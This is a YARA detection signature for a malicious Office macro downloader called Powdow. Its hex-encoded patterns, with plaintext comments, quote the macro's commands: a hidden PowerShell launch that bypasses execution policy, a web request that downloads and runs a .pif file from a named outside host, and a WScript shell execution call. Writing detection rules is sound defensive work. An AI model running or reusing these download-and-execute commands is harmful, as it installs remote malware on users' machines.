DefenderYara/TrojanDownloader/O97M/Powdow/TrojanDownloader_O97M_Powdo...

14 lines
1.3 KiB
Plaintext

rule TrojanDownloader_O97M_Powdow_STW_MTB{
meta:
description = "TrojanDownloader:O97M/Powdow.STW!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,04 00 04 00 04 00 00 "
strings :
$a_01_0 = {70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 68 69 64 64 65 6e 20 2d 65 78 65 63 75 74 69 6f 6e 70 6f 6c 69 63 79 20 62 79 70 61 73 73 3b } //1 powershell -WindowStyle hidden -executionpolicy bypass;
$a_01_1 = {49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 22 68 74 74 70 73 3a 2f 2f 6d 69 6e 64 66 72 65 65 2e 63 6f 2e 7a 61 2f 31 2f 52 65 63 72 79 70 74 65 64 2e 70 69 66 22 22 20 2d 4f 75 74 46 69 6c 65 20 24 54 65 6d 70 46 69 6c 65 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 54 65 6d 70 46 69 6c 65 3b } //1 Invoke-WebRequest -Uri ""https://mindfree.co.za/1/Recrypted.pif"" -OutFile $TempFile; Start-Process $TempFile;
$a_01_2 = {53 65 74 20 6f 57 73 68 53 68 65 6c 6c 45 78 65 63 20 3d 20 6f 57 73 68 53 68 65 6c 6c 2e 45 78 65 63 28 73 43 6f 6d 6d 61 6e 64 29 } //1 Set oWshShellExec = oWshShell.Exec(sCommand)
$a_01_3 = {73 4f 75 74 70 75 74 20 3d 20 6f 57 73 68 53 68 65 6c 6c 45 78 65 63 2e 53 74 64 4f 75 74 2e 52 65 61 64 41 6c 6c } //1 sOutput = oWshShellExec.StdOut.ReadAll
condition:
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1) >=4
}